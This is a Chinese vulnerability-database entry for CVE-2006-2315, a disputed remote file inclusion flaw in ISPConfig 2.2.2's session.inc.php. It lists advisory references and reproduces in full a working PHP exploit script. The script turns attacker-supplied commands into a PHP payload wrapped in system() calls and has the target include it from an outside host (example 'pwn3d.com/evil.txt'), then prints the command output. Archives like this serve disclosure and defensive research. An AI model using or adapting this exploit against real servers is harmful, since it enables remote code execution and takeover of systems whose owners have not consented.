ISPConfig Session.INC.PHP 远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110244 漏洞类型 代码注入
发布时间 2006-05-09 更新时间 2006-12-06
CVE编号 CVE-2006-2315 CNNVD-ID CNNVD-200605-203
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/27845
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200605-203
|漏洞详情
**有争议**ISPConfig2.2.2及之前版本的session.inc.php存在PHP远程文件包含漏洞。远程攻击者可以借助go_info[server][classes_root]参数中的URL,执行任意PHP代码。注:厂商对此漏洞提出反驳,声称session.inc.php不在rootinversion2.2版本的web根目录下,而register_globals并未启用。
|漏洞EXP
source: http://www.securityfocus.com/bid/17909/info

ISPConfig is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.

An attacker can exploit this issue to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.

This issue affects version 2.2.2; other versions may also be affected.

<?php
/*
ISPConfig Remote File Inclusion Exploit c0ded by ReZEN
Sh0uts: xorcrew.net, ajax, gml, #subterrain, My gf
url:  http://www.xorcrew.net/ReZEN

example:
turl: http://www.target.com/lib/session.inc.php?go_info[server][classes_root]=
hurl: http://www.pwn3d.com/evil.txt?

*/

$cmd = $_POST["cmd"];
$turl = $_POST["turl"];
$hurl = $_POST["hurl"];

$form= "<form method=\"post\" action=\"".$PHP_SELF."\">"
    ."turl:<br><input type=\"text\" name=\"turl\" size=\"90\" value=\"".$turl."\"><br>"
    ."hurl:<br><input type=\"text\" name=\"hurl\" size=\"90\" value=\"".$hurl."\"><br>"
    ."cmd:<br><input type=\"text\" name=\"cmd\" size=\"90\" value=\"".$cmd."\"><br>"
    ."<input type=\"submit\" value=\"Submit\" name=\"submit\">"
    ."</form><HR WIDTH=\"650\" ALIGN=\"LEFT\">";

if (!isset($_POST['submit'])) 
{

echo $form;

}else{

$file = fopen ("test.txt", "w+");

fwrite($file, "<?php system(\"echo ++BEGIN++\"); system(\"".$cmd."\"); 
system(\"echo ++END++\"); ?>");
fclose($file);

$file = fopen ($turl.$hurl, "r");
if (!$file) {
    echo "<p>Unable to get output.\n";
    exit;
}

echo $form;

while (!feof ($file)) {
    $line .= fgets ($file, 1024)."<br>";
    }
$tpos1 = strpos($line, "++BEGIN++");
$tpos2 = strpos($line, "++END++");
$tpos1 = $tpos1+strlen("++BEGIN++");
$tpos2 = $tpos2-$tpos1;
$output = substr($line, $tpos1, $tpos2);
echo $output;

}
?>
|参考资料

来源:MISC
链接:http://www.xorcrew.net/xpa/XPA-ISPConfig.txt
来源:BID
名称:17909
链接:http://www.securityfocus.com/bid/17909
来源:BUGTRAQ
名称:20060616Re:[BugtraqID:17909]ISPConfigSession.INC.PHPRemoteFileIncludeVulnerability
链接:http://www.securityfocus.com/archive/1/archive/1/437456/100/200/threaded
来源:OSVDB
名称:25355
链接:http://www.osvdb.org/25355
来源:MILW0RM
名称:1762
链接:http://www.milw0rm.com/exploits/1762
来源:MISC
链接:http://www.howtoforge.com/forums/showthread.php?t=4123
来源:VUPEN
名称:ADV-2006-1727
链接:http://www.frsirt.com/english/advisories/2006/1727
来源:SECUNIA
名称:19994
链接:http://secunia.com/advisories/19994
来源:XF
名称:ispconfig-session-inc-file-include(26299)
链接:http://xforce.iss.net/xforce/xfdb/26299
来源:MILW0RM
名称:1762
链接:http://milw0rm.com/exploits/1762
来源:FULLDISC
名称:20060507[XPA]-ISPConfig<=2.2.2-RemoteCommandExecutionVulnerability
链接:http://lists.grok.org.uk/pipermail/full-disclosure/2006-May/045855.html